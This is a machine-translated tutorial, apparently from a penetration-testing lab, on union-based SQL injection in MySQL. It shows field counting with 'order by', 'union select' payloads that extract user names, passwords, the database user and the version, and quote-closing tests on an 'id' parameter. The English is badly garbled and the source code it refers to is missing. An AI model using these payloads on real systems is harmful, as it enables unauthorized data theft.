The article explains in detail web Safety SQL Inject , Through more in-depth grasp of the content in the text SQL Principle and detection method of injection , So it can be better used in penetration test ; The content of the text is compiled by personal understanding , If there is any mistake , Bosses do not spray , Personal skills are not good ; Any technique mentioned in this article comes from range practice , For reference only , Do not use the related technology in the article to engage in illegal testing , If all the adverse consequences caused by this have nothing to do with the author of the article .

web Safety SQL Inject ( Two )

union select Joint query injection

principle

In joint injection , Usually we go through union select To jointly inject statements for query .

select * from users where user_id=1

When we use union select For joint injection , If the fields on both sides are inconsistent , May be an error .
Here our users Table and guestbook The fields in the table are inconsistent , So there was an error .

In us mysql Can be used in 1,2,3,4,5,6 This represents the number of fields , But before that, you need to judge the number of fields .
Through judgment, yes 8 A field , The fields on both sides are the same , Then the correct page is displayed .

select * from users where user_id=1 order by 8

When we replace these numbers with mysql A built-in function in , Then the data we need can appear .

select * from users where user_id=1 union select 1,2,3,user(),5,6,7,8

Similarly, we can also guess the fields directly .

select * from users where user_id=1 union select 1,2,3,4,5,6,user,password from users

If we need to display only one line , Can also be used limit To control , And usually we will use negative numbers or this NULL Come on , because select * from users where user_id=1 This statement is recorded , So we need to replace this with a nonexistent record , In this way, it is convenient to display the data obtained by the following statements .

select * from users where user_id=-1 union select 1,2,3,4,5,6,user,password from users limit 0,1

limit usage , When only one line is displayed if necessary , That can be used limit 1,1 limit 2,1 Such grammar .

limit 1 = limit 0,1 # Represents a line 
limit 2 = limit 0,2 # Represents two lines 
limit 1,1 # Delegate displays the second line .

The code analysis

After understanding the above principle , Through SQL Inject vulnerable code for analysis .

Vulnerability demonstration

After analyzing the source code , In line with us SQL Injection vulnerability produces two conditions , We can use the learned joint query , To test it .
We are analyzing , There is an error reporting function , And there is no filtering in the input , So here you can directly test with single quotation marks .
When we use single quotation marks , It directly returns the information we reported wrong . Judge that there may be injection here .

Because it is character type after analysis , So you need to use quotation marks when judging .

?id=1' and '1'='1' -- &Submit=Submit#

?id=1' and '1'='2 &Submit=Submit#

Here I use two ways to test , Mainly to illustrate this closed problem , You can see this in the source code above id Then there is a single quotation mark , So when we put all the single quotation marks , You need to use comments , The purpose is to annotate the single quotation marks in the original code , If there is no single quotation mark after it , The program will close the single quotation mark in the code with our input statement , So this is the principle of adding notes or not .

It can be seen that the two results are completely different , Basically, it can be confirmed that there is injection , Then directly use the joint query to obtain the data .

We can also print out all built-in functions by using group print strings .

?id=-1' union select 1,group_concat(user(),0x3A,database(),0x3A,version())--

Because in MySQL Version of 5 above , There is one information_schema Bring your own library , There are all database names , Table name , Field name , So we can combine this library to query , This grammar will not be introduced .